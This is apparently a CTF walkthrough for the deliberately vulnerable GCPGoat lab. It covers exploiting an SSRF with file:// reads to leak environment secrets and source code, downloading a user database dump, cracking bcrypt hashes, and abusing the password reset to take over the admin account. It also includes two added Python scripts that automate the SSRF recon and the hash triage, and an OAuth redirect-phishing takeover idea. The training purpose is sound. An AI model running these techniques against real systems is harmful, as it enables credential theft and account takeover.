GCPGoat (INE) GCP CTF solution: Module 1, Path 2 (SSRF, source code review, privilege escalation)
Hi readers, in this post we will deploy and solve the GCPGoat Module 1 challenge.
This walkthrough covers the second attack path, shown in the diagram below.
Video Walkthrough:
https://www.youtube.com/watch?v=fyCtrM3eCd8
https://www.youtube.com/watch?v=dtLg4Z8bHNk
Prerequisites-
a. Admin access to a GCP account (a new free-tier account works)
b. Terraform already installed
Deploying the challenge-
1. Clone the project-
git clone https://github.com/ine-labs/GCPGoat
2. Install the gcloud CLI if it is not already installed
a. Follow the detailed steps in the official documentation below-
b. Initialize or reinitialize gcloud
gcloud init
# "gcloud init --help" for more info
3. Authentication
a. Create Application Default Credentials (the credentials Terraform's Google provider picks up):
gcloud auth application-default login
b. You will get a URL. Open it in a browser where you are logged in with the administrative Google account.
c. After you consent, the browser is redirected to another URL starting with something like "http://localhost:8085/....."
d. Copy that URL and open it with curl (or a browser) on the machine where gcloud is running.
Note: The redirect URL carries the OAuth authorization code. gcloud is listening on port 8085 for exactly this redirect; it exchanges the code for access/refresh tokens and stores them as Application Default Credentials. That is why the URL has to reach the machine running gcloud, even if you logged in from a browser somewhere else.
Bonus: Potential attack vector. If an attacker can trick a user into opening such an authentication URL while the user is logged in to their Google account, and then get the user to hand over the resulting localhost redirect URL, the attacker can redeem the authorization code in that URL for the user's credentials: a gcloud account takeover!! The code is single-use and short-lived, so it has to be redeemed quickly and before the victim's own gcloud listener sees it.
4. Change the billing account name in main.tf (if you are not using the default billing account)-
5. Then deploy the Terraform resources-
terraform init
terraform apply --auto-approve
Solving the challenge-
1. Finding SSRF-
a. Sign up and log in to the web application.
b. Scan the web app after logging in using Burp Suite (because we are lazy :)
We got SSRF in the backend function's save-content endpoint, which fetches whatever URL is passed in the value parameter-
https://us-west1-gcp-goat-9a658560d7afd9b8.cloudfunctions.net/backend-function/save-content?value=<collaborator_link>
Note: You can use a free alternative to Collaborator- https://app.interactsh.com/
2. Exploiting SSRF-
The fetch also accepts the file:// scheme, so the same parameter reads local files from the function's container-
?value=file:///etc/passwd
?value=file:///proc/self/environ
# Reading environment variables (the file is NUL-separated, so the variables may appear run together in the response). We covered this technique in detail here: https://pswalia2u.medium.com/turning-lfi-into-rce-by-sending-emails-via-smtp-58b499a81de3
# Found the JWT secret in an environment variable
T2BYL6#]zc>Byuzu
# Found the project name
gcp-goat-9a658560d7afd9b8
# Present working directory of the process
/workspace
?value=file:///proc/self/status
# Reading process info
The Uid and Gid lines show 33/33; matching them against the /etc/passwd output identifies the user the process runs as: www-data.
?value=file:///proc/sys/kernel/hostname # fetching the hostname
localhost
?value=file:///proc/self/cmdline
/layers/google.python.pip/pip/bin/python3 /layers/google.python.pip/pip/bin/functions-framework
Searching (Google or ChatGPT) for "functions-framework" leads to its GitHub repo (https://github.com/GoogleCloudPlatform/functions-framework-python). In the usage example there, the function code lives in a main.py file, which is what the framework loads by default.
So it is worth checking whether this file is present in the process's working directory, /workspace....
# Trying to find and read the source code
?value=file:///workspace/main.py
As expected, we got the main.py source code-
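The recon above, done by hand one file at a time, can be scripted. The following is an added example, not code from the GCPGoat project or the original post: it drives the save-content SSRF with file:// URLs, parses the NUL-separated /proc files correctly, resolves the uid against /etc/passwd, flags credential-looking environment variables, and, when the command line shows the Functions Framework, pulls main.py from the working directory. It assumes (not stated on the page) that the function returns the fetched file body verbatim in its HTTP response; FUNCTION_URL is the endpoint from the walkthrough and should be replaced with your own deployment's URL.

```python
# Added example, not code from the GCPGoat project or the original post.
# Drives the save-content SSRF to read local files via file:// and parses the
# /proc entries the walkthrough reads by hand, to identify the process.
#
# Assumptions (not stated on the page): the function returns the fetched
# file body verbatim in its HTTP response, and FUNCTION_URL is the endpoint
# from the walkthrough; replace it with your own deployment's URL.
import urllib.parse
import urllib.request

FUNCTION_URL = ("https://us-west1-gcp-goat-9a658560d7afd9b8.cloudfunctions.net"
                "/backend-function/save-content")

# Environment variable names worth a second look when /proc/self/environ leaks.
SENSITIVE_MARKERS = ("SECRET", "KEY", "TOKEN", "PASS", "CREDENTIAL")


def ssrf_url(path, base=FUNCTION_URL):
    """Build the SSRF request URL that makes the function fetch file://<path>."""
    return base + "?value=" + urllib.parse.quote("file://" + path, safe="/:")


def ssrf_read(path, base=FUNCTION_URL, timeout=15):
    """Fetch a local file of the function container through the SSRF; raw bytes."""
    with urllib.request.urlopen(ssrf_url(path, base), timeout=timeout) as resp:
        return resp.read()


def split_nul(data):
    """/proc/self/environ and /proc/self/cmdline are NUL-separated, not line-separated."""
    return [p.decode("utf-8", "replace") for p in data.split(b"\0") if p]


def parse_environ(data):
    """KEY=VALUE entries of /proc/self/environ as a dict."""
    env = {}
    for entry in split_nul(data):
        key, _, value = entry.partition("=")
        env[key] = value
    return env


def sensitive_env(env):
    """Subset of the environment whose names look like credentials (e.g. a JWT secret)."""
    return {k: v for k, v in env.items()
            if any(marker in k.upper() for marker in SENSITIVE_MARKERS)}


def parse_status_ids(text):
    """Real uid/gid of the process from the Uid:/Gid: lines of /proc/self/status."""
    ids = {}
    for line in text.splitlines():
        key, _, value = line.partition(":")
        if key in ("Uid", "Gid"):
            ids[key.lower()] = int(value.split()[0])  # first column is the real id
    return ids


def parse_passwd(text):
    """uid -> username from /etc/passwd, to name the uid found in /proc/self/status."""
    users = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2].isdigit():
            users[int(fields[2])] = fields[0]
    return users


def recon(base=FUNCTION_URL):
    """Repeat the walkthrough's recon in one go and return the findings."""
    passwd = parse_passwd(ssrf_read("/etc/passwd", base).decode("utf-8", "replace"))
    ids = parse_status_ids(ssrf_read("/proc/self/status", base).decode("utf-8", "replace"))
    env = parse_environ(ssrf_read("/proc/self/environ", base))
    cmdline = split_nul(ssrf_read("/proc/self/cmdline", base))
    findings = {
        "user": passwd.get(ids.get("uid"), "uid %s" % ids.get("uid")),
        "hostname": ssrf_read("/proc/sys/kernel/hostname", base).decode().strip(),
        "cmdline": cmdline,
        "secrets": sensitive_env(env),
        "cwd": env.get("PWD"),
    }
    # The Functions Framework loads main.py from the working directory by default,
    # so that is where the function's source code should be.
    if any("functions-framework" in arg for arg in cmdline) and env.get("PWD"):
        findings["source"] = ssrf_read(env["PWD"] + "/main.py", base).decode("utf-8", "replace")
    return findings


if __name__ == "__main__":
    import json
    result = recon()
    source = result.pop("source", None)
    print(json.dumps(result, indent=2))
    if source:
        print(source)
```

If the response wraps the file content in HTML or JSON instead of returning it raw, adjust ssrf_read to extract the body before the parsers see it; the parsers themselves only depend on the formats of the /proc files.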
3. Source code analysis-
On line 226 of main.py we found the path of a database backup (dump) file-
4. Fetching the dump file-
# <function endpoint>/dump-db-321423541325
https://us-west1-gcp-goat-9a658560d7afd9b8.cloudfunctions.net/backend-function/dump-db-321423541325/dump-db-321423541325
We got the password hashes and profile details of the other user accounts!!
5. Let's try to crack these password hashes-
# john doe has user id "1" (the first user in most CMSs is the administrator, so let's try to crack his password first)
$2a$10$gNsZfdsyRtSRRDg9oLnAUeb.bkmfrhbotddzMKf6W0pS2oItkVYxO
The $2a$10$ prefix marks a bcrypt hash with cost factor 10 (2^10 key-expansion rounds), so cracking is slow: run hashcat mode 3200 or john --format=bcrypt against a wordlist rather than brute-forcing.
6. Privesc to admin-
Either log in with the cracked password or, since the dump already gives us johndoe's email and the answer to his security question, abuse the forgot-password functionality to reset his password.
{
"password":"$2a$10$gNsZfdsyRtSRRDg9oLnAUeb.bkmfrhbotddzMKf6W0pS2oItkVYxO",
"userStatus":"active",
"id":"1",
"phone":"1234567890",
"creationDate":"2022-01-25T00:00:00.000Z",
"country":"India",
"authLevel":"0",
"address":"John Doe apartment, John Doe Street, Pune",
"secretAnswer":"Cricket",
"secretQuestion":"What is your favourite sport?",
"email":"johndoe@gmail.com",
"username":"johndoe",
"name":"John Doe"
}
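A small triage script for a dump like this one, added here as an example and not taken from the GCPGoat project or the original post: it decodes the bcrypt header of every password hash (variant, cost factor, salt, digest) so you know what a cracking run would cost, writes the hashes in the user:hash form that hashcat (mode 3200) and john accept, and lists, per account, the fields that make the forgot-password route usable without cracking anything. It assumes the records have the JSON shape shown above; the second record in the sample is constructed for illustration and its hash is a shape-correct placeholder, not a real hash.

```python
# Added example, not code from the GCPGoat project or the original post.
# Triages a leaked user dump like the one fetched above: decodes the bcrypt
# header of every password hash (variant, cost, salt, digest) to see what a
# cracking run would cost, and lists the fields that make forgot-password
# abusable without cracking anything (email plus secret question and answer).
#
# Assumptions: records have the JSON shape shown in the walkthrough. The second
# record below is constructed for illustration; its hash is a placeholder with
# the right shape, not a real hash.
import json
import re

# Modular crypt format: $<variant>$<cost>$<22-char salt><31-char digest>, 60 chars.
BCRYPT_RE = re.compile(
    r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")

SAMPLE_DUMP = json.loads("""[
  {"password": "$2a$10$gNsZfdsyRtSRRDg9oLnAUeb.bkmfrhbotddzMKf6W0pS2oItkVYxO",
   "id": "1", "authLevel": "0", "username": "johndoe", "email": "johndoe@gmail.com",
   "secretQuestion": "What is your favourite sport?", "secretAnswer": "Cricket"},
  {"password": "$2a$10$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0",
   "id": "2", "authLevel": "1", "username": "constructed-user", "email": "user@example.invalid",
   "secretQuestion": "", "secretAnswer": ""}
]""")


def parse_bcrypt(h):
    """Split a bcrypt string into its parts; raises ValueError for anything else."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a bcrypt hash: %r" % h)
    variant, cost, salt, digest = m.groups()
    return {"variant": variant, "cost": int(cost), "rounds": 2 ** int(cost),
            "salt": salt, "digest": digest}


def reset_material(rec):
    """Everything the forgot-password route needs, taken straight from the dump."""
    return {k: rec.get(k) for k in ("username", "email", "secretQuestion", "secretAnswer")}


def triage(records):
    """One row per account, lowest id first (the first account created is usually the admin)."""
    rows = []
    for rec in records:
        info = parse_bcrypt(rec["password"])
        rows.append({
            "id": int(rec["id"]),
            "username": rec["username"],
            "authLevel": rec.get("authLevel"),
            "bcrypt_cost": info["cost"],
            "reset_possible": bool(rec.get("email") and rec.get("secretAnswer")),
        })
    return sorted(rows, key=lambda r: r["id"])


def cracking_commands(records, hash_file="hashes.txt", wordlist="rockyou.txt"):
    """Hash file in user:hash form plus the hashcat (mode 3200 = bcrypt) and john invocations."""
    lines = ["%s:%s" % (r["username"], r["password"]) for r in records]
    return {
        "hash_file_contents": "\n".join(lines) + "\n",
        "hashcat": "hashcat -m 3200 -a 0 --username %s %s" % (hash_file, wordlist),
        "john": "john --format=bcrypt --wordlist=%s %s" % (wordlist, hash_file),
    }


if __name__ == "__main__":
    for row in triage(SAMPLE_DUMP):
        print(row)
    print(reset_material(SAMPLE_DUMP[0]))
    print(cracking_commands(SAMPLE_DUMP)["hashcat"])
```

Cost 10 means 1024 rounds of bcrypt's key expansion per guess, which is why a wordlist attack on one hash is reasonable but brute force is not; when reset_possible is true for the admin account, the forgot-password path is the cheaper route, as the walkthrough takes.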
7. Logging in as johndoe
And we got an admin user!!
References-